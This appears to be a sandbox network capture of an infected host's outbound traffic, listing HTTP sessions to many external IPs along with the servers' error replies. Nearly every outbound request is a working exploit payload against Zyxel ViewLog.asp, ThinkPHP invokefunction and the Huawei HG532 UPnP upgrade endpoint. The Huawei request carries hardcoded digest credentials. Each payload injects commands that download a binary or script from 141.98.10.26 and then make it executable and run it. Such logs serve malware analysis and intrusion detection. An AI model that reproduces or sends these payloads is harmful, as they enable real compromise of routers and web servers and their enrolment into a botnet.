Nov 22, 2023 08:40:08.960563898 CET	16780	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
415	192.168.2.23	59432	95.47.240.87	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:56.532418966 CET	8161	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:56.751245022 CET	8178	IN	HTTP/1.1 501 Not Implemented Connection: Keep-Alive Content-Length: 121 Date: Wed, 22 Nov 2023 07:38:56 GMT Expires: 0 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
416	192.168.2.23	47520	94.121.79.99	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:56.539273024 CET	8161	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
417	192.168.2.23	39666	62.29.120.219	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:56.545304060 CET	8162	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
418	192.168.2.23	55486	95.183.54.17	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:56.649101019 CET	8174	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:56.836311102 CET	8181	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:38:57 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
419	192.168.2.23	35880	95.100.234.98	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:56.649255991 CET	8174	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:56.837024927 CET	8182	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:56 GMT Date: Wed, 22 Nov 2023 07:38:56 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 63 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 30 36 33 38 37 33 36 26 23 34 36 3b 33 38 32 31 37 63 62 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.5c7e19b8.1700638736.38217cbd</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
420	192.168.2.23	52580	85.115.215.38	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:56.735769033 CET	8177	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:56.941416025 CET	8184	IN	HTTP/1.0 404 Not Found Date: Mon, 05 Jan 1970 02:21:18 GMT Server: Caddy v0.11.1 Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
421	192.168.2.23	48278	95.82.53.47	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:56.798968077 CET	8180	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:58.538392067 CET	8351	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:00.618001938 CET	8672	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:04.713447094 CET	9164	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:12.904284000 CET	10110	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:30.053877115 CET	12159	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:02.817348003 CET	16125	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
422	192.168.2.23	44984	112.179.60.253	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:57.087486982 CET	8186	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:57.376091957 CET	8214	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:57 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
423	192.168.2.23	59622	112.127.81.120	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:57.132797956 CET	8187	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:57.464066029 CET	8225	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:39:43 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
424	192.168.2.23	38270	112.49.9.224	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:57.481125116 CET	8226	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
425	192.168.2.23	38274	112.49.9.224	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:57.534063101 CET	8227	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
426	192.168.2.23	49582	41.42.157.24	37215

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:57.907901049 CET	8242	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.26 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Nov 22, 2023 08:38:58.166445971 CET	8307	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/xml; charset="utf-8" Server: Linux UPnP/1.0 Huawei-ATP-IGD EXT: Connection: Keep-Alive Content-Length: 398

Session ID	Source IP	Source Port	Destination IP	Destination Port
427	192.168.2.23	42810	95.100.203.72	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.051198006 CET	8303	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:58.229398966 CET	8311	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:38:58 GMT Date: Wed, 22 Nov 2023 07:38:58 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 34 63 62 36 34 35 66 26 23 34 36 3b 31 37 30 30 36 33 38 37 33 38 26 23 34 36 3b 35 35 66 61 33 37 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.44cb645f.1700638738.55fa37e</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
428	192.168.2.23	33636	95.101.174.12	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.053803921 CET	8304	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:58.237217903 CET	8313	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:38:58 GMT Date: Wed, 22 Nov 2023 07:38:58 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 34 64 65 34 35 36 38 26 23 34 36 3b 31 37 30 30 36 33 38 37 33 38 26 23 34 36 3b 63 37 38 36 32 31 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.44de4568.1700638738.c786210</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
429	192.168.2.23	47808	95.100.76.133	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.057554960 CET	8305	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:58.244693041 CET	8314	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:38:58 GMT Date: Wed, 22 Nov 2023 07:38:58 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 31 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 30 36 33 38 37 33 38 26 23 34 36 3b 64 63 39 38 39 35 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 